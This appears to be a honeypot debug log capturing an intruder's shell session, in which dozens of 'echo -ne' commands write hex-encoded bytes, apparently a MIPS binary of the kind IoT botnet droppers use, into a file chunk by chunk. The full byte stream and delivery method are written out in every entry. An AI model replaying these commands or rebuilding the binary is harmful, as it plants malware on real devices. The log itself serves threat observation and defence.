2022-10-22 20:51:31.892 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,51,56,92,120,97,102,92,120,98,102,92,120,48,48,92,120,99,48,92,120,97,102,92,120,98,51,92,120,48,48,92,120,98,99,92,120,97,102,92,120,98,50,92,120,48,48,92,120,98,56,92,120,97,102,92,120,98,49,92,120,48,48,92,120,98,52,92,120,97,102,92,120,98,48,92,120,48,48,92,120,98,48,92,120,97,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,56,102,92,120,56,50,92,120,56,48,92,120,49,56,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.893 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x24\x50\x05\xe0\x82\x02\x00\x00\x00\x00\x00\x00\x14\x40\xff\xfd\x26\x10\x00\x01\x26\x10\xff\xff\x8f\x85\x80\x18\x8f\x82\x80"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.895 - [Debug] [SHELL] line from reader: echo -ne "\x00\x24\x50\x05\xe0\x82\x02\x00\x00\x00\x00\x00\x00\x14\x40\xff\xfd\x26\x10\x00\x01\x26\x10\xff\xff\x8f\x85\x80\x18\x8f\x82\x80" >> gay
2022-10-22 20:51:31.895 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,50,52,92,120,53,48,92,120,48,53,92,120,101,48,92,120,56,50,92,120,48,50,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,52,92,120,52,48,92,120,102,102,92,120,102,100,92,120,50,54,92,120,49,48,92,120,48,48,92,120,48,49,92,120,50,54,92,120,49,48,92,120,102,102,92,120,102,102,92,120,56,102,92,120,56,53,92,120,56,48,92,120,49,56,92,120,56,102,92,120,56,50,92,120,56,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.897 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x18\x8f\x99\x80\x48\x24\xa5\x05\xe8\x24\x04\x00\x01\x24\x06\x00\x06\x24\x42\x05\xe0\x03\x20\xf8\x09\x02\x02\x98\x23\x8f\xbc\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.899 - [Debug] [SHELL] line from reader: echo -ne "\x18\x8f\x99\x80\x48\x24\xa5\x05\xe8\x24\x04\x00\x01\x24\x06\x00\x06\x24\x42\x05\xe0\x03\x20\xf8\x09\x02\x02\x98\x23\x8f\xbc\x00" >> gay
2022-10-22 20:51:31.900 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,56,92,120,56,102,92,120,57,57,92,120,56,48,92,120,52,56,92,120,50,52,92,120,97,53,92,120,48,53,92,120,101,56,92,120,50,52,92,120,48,52,92,120,48,48,92,120,48,49,92,120,50,52,92,120,48,54,92,120,48,48,92,120,48,54,92,120,50,52,92,120,52,50,92,120,48,53,92,120,101,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,50,92,120,48,50,92,120,57,56,92,120,50,51,92,120,56,102,92,120,98,99,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.900 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x10\x24\x02\x00\x02\x8f\x99\x80\x4c\xa7\xa2\x00\x1c\x24\x02\x00\x50\x24\x07\x00\x2f\x24\x04\x00\x2e\x24\x05\x00\x17\x24\x06\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.902 - [Debug] [SHELL] line from reader: echo -ne "\x10\x24\x02\x00\x02\x8f\x99\x80\x4c\xa7\xa2\x00\x1c\x24\x02\x00\x50\x24\x07\x00\x2f\x24\x04\x00\x2e\x24\x05\x00\x17\x24\x06\x00" >> gay
2022-10-22 20:51:31.902 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,48,92,120,50,52,92,120,48,50,92,120,48,48,92,120,48,50,92,120,56,102,92,120,57,57,92,120,56,48,92,120,52,99,92,120,97,55,92,120,97,50,92,120,48,48,92,120,49,99,92,120,50,52,92,120,48,50,92,120,48,48,92,120,53,48,92,120,50,52,92,120,48,55,92,120,48,48,92,120,50,102,92,120,50,52,92,120,48,52,92,120,48,48,92,120,50,101,92,120,50,52,92,120,48,53,92,120,48,48,92,120,49,55,92,120,50,52,92,120,48,54,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.902 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x6d\x03\x20\xf8\x09\xa7\xa2\x00\x1e\x8f\xbc\x00\x10\x24\x05\x03\x01\x8f\x84\x80\x18\x8f\x99\x80\x60\x24\x84\x05\xf0\x24\x06\x01"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.904 - [Debug] [SHELL] line from reader: echo -ne "\x6d\x03\x20\xf8\x09\xa7\xa2\x00\x1e\x8f\xbc\x00\x10\x24\x05\x03\x01\x8f\x84\x80\x18\x8f\x99\x80\x60\x24\x84\x05\xf0\x24\x06\x01" >> gay
2022-10-22 20:51:31.905 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,54,100,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,97,55,92,120,97,50,92,120,48,48,92,120,49,101,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,50,52,92,120,48,53,92,120,48,51,92,120,48,49,92,120,56,102,92,120,56,52,92,120,56,48,92,120,49,56,92,120,56,102,92,120,57,57,92,120,56,48,92,120,54,48,92,120,50,52,92,120,56,52,92,120,48,53,92,120,102,48,92,120,50,52,92,120,48,54,92,120,48,49,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.905 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\xff\x03\x20\xf8\x09\xaf\xa2\x00\x20\x8f\xbc\x00\x10\x24\x04\x00\x02\x8f\x99\x80\x50\x24\x05\x00\x02\x00\x00\x30\x21\x03\x20\xf8"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.907 - [Debug] [SHELL] line from reader: echo -ne "\xff\x03\x20\xf8\x09\xaf\xa2\x00\x20\x8f\xbc\x00\x10\x24\x04\x00\x02\x8f\x99\x80\x50\x24\x05\x00\x02\x00\x00\x30\x21\x03\x20\xf8" >> gay
2022-10-22 20:51:31.907 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,102,102,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,97,102,92,120,97,50,92,120,48,48,92,120,50,48,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,50,52,92,120,48,52,92,120,48,48,92,120,48,50,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,48,92,120,50,52,92,120,48,53,92,120,48,48,92,120,48,50,92,120,48,48,92,120,48,48,92,120,51,48,92,120,50,49,92,120,48,51,92,120,50,48,92,120,102,56,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.908 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x09\x00\x40\x90\x21\x00\x40\x88\x21\x24\x02\xff\xff\x8f\xbc\x00\x10\x12\x22\x00\x03\x00\x00\x00\x00\x16\x42\x00\x07\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.910 - [Debug] [SHELL] line from reader: echo -ne "\x09\x00\x40\x90\x21\x00\x40\x88\x21\x24\x02\xff\xff\x8f\xbc\x00\x10\x12\x22\x00\x03\x00\x00\x00\x00\x16\x42\x00\x07\x00\x00\x00" >> gay
2022-10-22 20:51:31.910 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,57,92,120,48,48,92,120,52,48,92,120,57,48,92,120,50,49,92,120,48,48,92,120,52,48,92,120,56,56,92,120,50,49,92,120,50,52,92,120,48,50,92,120,102,102,92,120,102,102,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,49,50,92,120,50,50,92,120,48,48,92,120,48,51,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,54,92,120,52,50,92,120,48,48,92,120,48,55,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.910 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x8f\x99\x80\x54\x00\x00\x00\x00\x03\x20\xf8\x09\x24\x04\x00\x01\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x44\x02\x20\x20"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.912 - [Debug] [SHELL] line from reader: echo -ne "\x00\x8f\x99\x80\x54\x00\x00\x00\x00\x03\x20\xf8\x09\x24\x04\x00\x01\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x44\x02\x20\x20" >> gay
2022-10-22 20:51:31.912 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,52,92,120,48,48,92,120,48,49,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,52,52,92,120,48,50,92,120,50,48,92,120,50,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.912 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x21\x27\xa5\x00\x1c\x03\x20\xf8\x09\x24\x06\x00\x10\x8f\xbc\x00\x10\x04\x41\x00\x0f\x00\x40\x80\x21\x8f\x85\x80\x18\x8f\x99\x80"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.914 - [Debug] [SHELL] line from reader: echo -ne "\x21\x27\xa5\x00\x1c\x03\x20\xf8\x09\x24\x06\x00\x10\x8f\xbc\x00\x10\x04\x41\x00\x0f\x00\x40\x80\x21\x8f\x85\x80\x18\x8f\x99\x80" >> gay
2022-10-22 20:51:31.914 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,50,49,92,120,50,55,92,120,97,53,92,120,48,48,92,120,49,99,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,54,92,120,48,48,92,120,49,48,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,52,92,120,52,49,92,120,48,48,92,120,48,102,92,120,48,48,92,120,52,48,92,120,56,48,92,120,50,49,92,120,56,102,92,120,56,53,92,120,56,48,92,120,49,56,92,120,56,102,92,120,57,57,92,120,56,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.914 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x48\x24\xa5\x05\xfc\x24\x04\x00\x01\x03\x20\xf8\x09\x24\x06\x00\x04\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x54\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.916 - [Debug] [SHELL] line from reader: echo -ne "\x48\x24\xa5\x05\xfc\x24\x04\x00\x01\x03\x20\xf8\x09\x24\x06\x00\x04\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x54\x00\x00\x00" >> gay
2022-10-22 20:51:31.916 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,52,56,92,120,50,52,92,120,97,53,92,120,48,53,92,120,102,99,92,120,50,52,92,120,48,52,92,120,48,48,92,120,48,49,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,54,92,120,48,48,92,120,48,52,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,52,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.916 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x03\x20\xf8\x09\x00\x10\x20\x23\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x85\x80\x18\x8f\x99\x80\x48\x26\x70\x00\x1e\x24\xa5\x06"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.919 - [Debug] [SHELL] line from reader: echo -ne "\x00\x03\x20\xf8\x09\x00\x10\x20\x23\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x85\x80\x18\x8f\x99\x80\x48\x26\x70\x00\x1e\x24\xa5\x06" >> gay
2022-10-22 20:51:31.919 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,48,92,120,49,48,92,120,50,48,92,120,50,51,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,56,53,92,120,56,48,92,120,49,56,92,120,56,102,92,120,57,57,92,120,56,48,92,120,52,56,92,120,50,54,92,120,55,48,92,120,48,48,92,120,49,101,92,120,50,52,92,120,97,53,92,120,48,54,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.919 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x04\x02\x20\x20\x21\x03\x20\xf8\x09\x02\x00\x30\x21\x8f\xbc\x00\x10\x10\x50\x00\x07\x00\x00\x80\x21\x8f\x99\x80\x54\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.921 - [Debug] [SHELL] line from reader: echo -ne "\x04\x02\x20\x20\x21\x03\x20\xf8\x09\x02\x00\x30\x21\x8f\xbc\x00\x10\x10\x50\x00\x07\x00\x00\x80\x21\x8f\x99\x80\x54\x00\x00\x00" >> gay
2022-10-22 20:51:31.921 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,52,92,120,48,50,92,120,50,48,92,120,50,48,92,120,50,49,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,50,92,120,48,48,92,120,51,48,92,120,50,49,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,49,48,92,120,53,48,92,120,48,48,92,120,48,55,92,120,48,48,92,120,48,48,92,120,56,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,52,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.921 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x03\x20\xf8\x09\x24\x04\x00\x03\x8f\xbc\x00\x10\x00\x00\x80\x21\x8f\x99\x80\x38\x02\x20\x20\x21\x27\xa5\x00\x18\x03\x20\xf8"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.923 - [Debug] [SHELL] line from reader: echo -ne "\x00\x03\x20\xf8\x09\x24\x04\x00\x03\x8f\xbc\x00\x10\x00\x00\x80\x21\x8f\x99\x80\x38\x02\x20\x20\x21\x27\xa5\x00\x18\x03\x20\xf8" >> gay
2022-10-22 20:51:31.923 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,52,92,120,48,48,92,120,48,51,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,56,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,51,56,92,120,48,50,92,120,50,48,92,120,50,48,92,120,50,49,92,120,50,55,92,120,97,53,92,120,48,48,92,120,49,56,92,120,48,51,92,120,50,48,92,120,102,56,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.923 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x09\x24\x06\x00\x01\x8f\xbc\x00\x10\x24\x03\x00\x01\x8f\x99\x80\x54\x10\x43\x00\x04\x24\x04\x00\x04\x03\x20\xf8\x09\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.925 - [Debug] [SHELL] line from reader: echo -ne "\x09\x24\x06\x00\x01\x8f\xbc\x00\x10\x24\x03\x00\x01\x8f\x99\x80\x54\x10\x43\x00\x04\x24\x04\x00\x04\x03\x20\xf8\x09\x00\x00\x00" >> gay
2022-10-22 20:51:31.925 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,57,92,120,50,52,92,120,48,54,92,120,48,48,92,120,48,49,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,50,52,92,120,48,51,92,120,48,48,92,120,48,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,52,92,120,49,48,92,120,52,51,92,120,48,48,92,120,48,52,92,120,50,52,92,120,48,52,92,120,48,48,92,120,48,52,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.925 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x8f\xbc\x00\x10\x83\xa3\x00\x18\x00\x10\x12\x00\x00\x43\x80\x25\x3c\x02\x0d\x0a\x34\x42\x0d\x0a\x16\x02\xff\xed\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.927 - [Debug] [SHELL] line from reader: echo -ne "\x00\x8f\xbc\x00\x10\x83\xa3\x00\x18\x00\x10\x12\x00\x00\x43\x80\x25\x3c\x02\x0d\x0a\x34\x42\x0d\x0a\x16\x02\xff\xed\x00\x00\x00" >> gay
2022-10-22 20:51:31.927 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,56,51,92,120,97,51,92,120,48,48,92,120,49,56,92,120,48,48,92,120,49,48,92,120,49,50,92,120,48,48,92,120,48,48,92,120,52,51,92,120,56,48,92,120,50,53,92,120,51,99,92,120,48,50,92,120,48,100,92,120,48,97,92,120,51,52,92,120,52,50,92,120,48,100,92,120,48,97,92,120,49,54,92,120,48,50,92,120,102,102,92,120,101,100,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.928 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x8f\x99\x80\x38\x27\xb0\x00\x2c\x02\x20\x20\x21\x02\x00\x28\x21\x03\x20\xf8\x09\x24\x06\x00\x80\x8f\xbc\x00\x10\x02\x00\x28"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.930 - [Debug] [SHELL] line from reader: echo -ne "\x00\x8f\x99\x80\x38\x27\xb0\x00\x2c\x02\x20\x20\x21\x02\x00\x28\x21\x03\x20\xf8\x09\x24\x06\x00\x80\x8f\xbc\x00\x10\x02\x00\x28" >> gay
2022-10-22 20:51:31.930 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,51,56,92,120,50,55,92,120,98,48,92,120,48,48,92,120,50,99,92,120,48,50,92,120,50,48,92,120,50,48,92,120,50,49,92,120,48,50,92,120,48,48,92,120,50,56,92,120,50,49,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,54,92,120,48,48,92,120,56,48,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,50,92,120,48,48,92,120,50,56,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.930 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x21\x8f\x99\x80\x48\x00\x40\x30\x21\x18\x40\x00\x06\x02\x40\x20\x21\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x10\x10\x00\xff"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.932 - [Debug] [SHELL] line from reader: echo -ne "\x21\x8f\x99\x80\x48\x00\x40\x30\x21\x18\x40\x00\x06\x02\x40\x20\x21\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x10\x10\x00\xff" >> gay
2022-10-22 20:51:31.932 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,52,56,92,120,48,48,92,120,52,48,92,120,51,48,92,120,50,49,92,120,49,56,92,120,52,48,92,120,48,48,92,120,48,54,92,120,48,50,92,120,52,48,92,120,50,48,92,120,50,49,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,49,48,92,120,48,48,92,120,102,102,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.932 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\xf0\x00\x00\x00\x00\x8f\x99\x80\x58\x00\x00\x00\x00\x03\x20\xf8\x09\x02\x20\x20\x21\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.934 - [Debug] [SHELL] line from reader: echo -ne "\xf0\x00\x00\x00\x00\x8f\x99\x80\x58\x00\x00\x00\x00\x03\x20\xf8\x09\x02\x20\x20\x21\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80" >> gay
2022-10-22 20:51:31.934 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,102,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,50,92,120,50,48,92,120,50,48,92,120,50,49,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,57,57,92,120,56,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.934 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x58\x00\x00\x00\x00\x03\x20\xf8\x09\x02\x40\x20\x21\x8f\xbc\x00\x10\x24\x04\x00\x01\x8f\x85\x80\x18\x8f\x99\x80\x48\x24\xa5\x06"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.937 - [Debug] [SHELL] line from reader: echo -ne "\x58\x00\x00\x00\x00\x03\x20\xf8\x09\x02\x40\x20\x21\x8f\xbc\x00\x10\x24\x04\x00\x01\x8f\x85\x80\x18\x8f\x99\x80\x48\x24\xa5\x06" >> gay
2022-10-22 20:51:31.937 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,53,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,50,92,120,52,48,92,120,50,48,92,120,50,49,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,50,52,92,120,48,52,92,120,48,48,92,120,48,49,92,120,56,102,92,120,56,53,92,120,56,48,92,120,49,56,92,120,56,102,92,120,57,57,92,120,56,48,92,120,52,56,92,120,50,52,92,120,97,53,92,120,48,54,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.937 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x24\x03\x20\xf8\x09\x24\x06\x00\x04\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x54\x00\x00\x00\x00\x03\x20\xf8\x09\x24\x04\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.939 - [Debug] [SHELL] line from reader: echo -ne "\x24\x03\x20\xf8\x09\x24\x06\x00\x04\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x54\x00\x00\x00\x00\x03\x20\xf8\x09\x24\x04\x00" >> gay
2022-10-22 20:51:31.939 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,50,52,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,54,92,120,48,48,92,120,48,52,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,52,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.939 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x05\x8f\xbc\x00\x10\x8f\xbf\x00\xc0\x8f\xb3\x00\xbc\x8f\xb2\x00\xb8\x8f\xb1\x00\xb4\x8f\xb0\x00\xb0\x03\xe0\x00\x08\x27\xbd\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.941 - [Debug] [SHELL] line from reader: echo -ne "\x05\x8f\xbc\x00\x10\x8f\xbf\x00\xc0\x8f\xb3\x00\xbc\x8f\xb2\x00\xb8\x8f\xb1\x00\xb4\x8f\xb0\x00\xb0\x03\xe0\x00\x08\x27\xbd\x00" >> gay
2022-10-22 20:51:31.941 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,53,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,56,102,92,120,98,102,92,120,48,48,92,120,99,48,92,120,56,102,92,120,98,51,92,120,48,48,92,120,98,99,92,120,56,102,92,120,98,50,92,120,48,48,92,120,98,56,92,120,56,102,92,120,98,49,92,120,48,48,92,120,98,52,92,120,56,102,92,120,98,48,92,120,48,48,92,120,98,48,92,120,48,51,92,120,101,48,92,120,48,48,92,120,48,56,92,120,50,55,92,120,98,100,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.941 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\xc8\x3c\x1c\x00\x05\x27\x9c\x81\x60\x03\x99\xe0\x21\x03\xe0\x00\x21\x04\x11\x00\x01\x00\x00\x00\x00\x3c\x1c\x00\x05\x27\x9c\x81"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.943 - [Debug] [SHELL] line from reader: echo -ne "\xc8\x3c\x1c\x00\x05\x27\x9c\x81\x60\x03\x99\xe0\x21\x03\xe0\x00\x21\x04\x11\x00\x01\x00\x00\x00\x00\x3c\x1c\x00\x05\x27\x9c\x81" >> gay
2022-10-22 20:51:31.943 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,99,56,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,49,92,120,54,48,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,48,51,92,120,101,48,92,120,48,48,92,120,50,49,92,120,48,52,92,120,49,49,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,49,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.943 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x48\x03\x9f\xe0\x21\x00\x00\xf8\x21\x8f\x99\x80\x3c\x00\x00\x00\x00\x03\x20\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.945 - [Debug] [SHELL] line from reader: echo -ne "\x48\x03\x9f\xe0\x21\x00\x00\xf8\x21\x8f\x99\x80\x3c\x00\x00\x00\x00\x03\x20\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 20:51:31.945 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,52,56,92,120,48,51,92,120,57,102,92,120,101,48,92,120,50,49,92,120,48,48,92,120,48,48,92,120,102,56,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,51,99,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,50,48,92,120,48,48,92,120,48,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.945 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x3c\x1c\x00\x05\x27\x9c\x81\x20\x03\x99\xe0\x21\x00\x80\x10\x21\x00\xa0\x20\x21\x00\xc0\x28\x21\x00\xe0\x30\x21\x8f\xa7\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.946 - [Debug] [SHELL] line from reader: echo -ne "\x00\x3c\x1c\x00\x05\x27\x9c\x81\x20\x03\x99\xe0\x21\x00\x80\x10\x21\x00\xa0\x20\x21\x00\xc0\x28\x21\x00\xe0\x30\x21\x8f\xa7\x00" >> gay
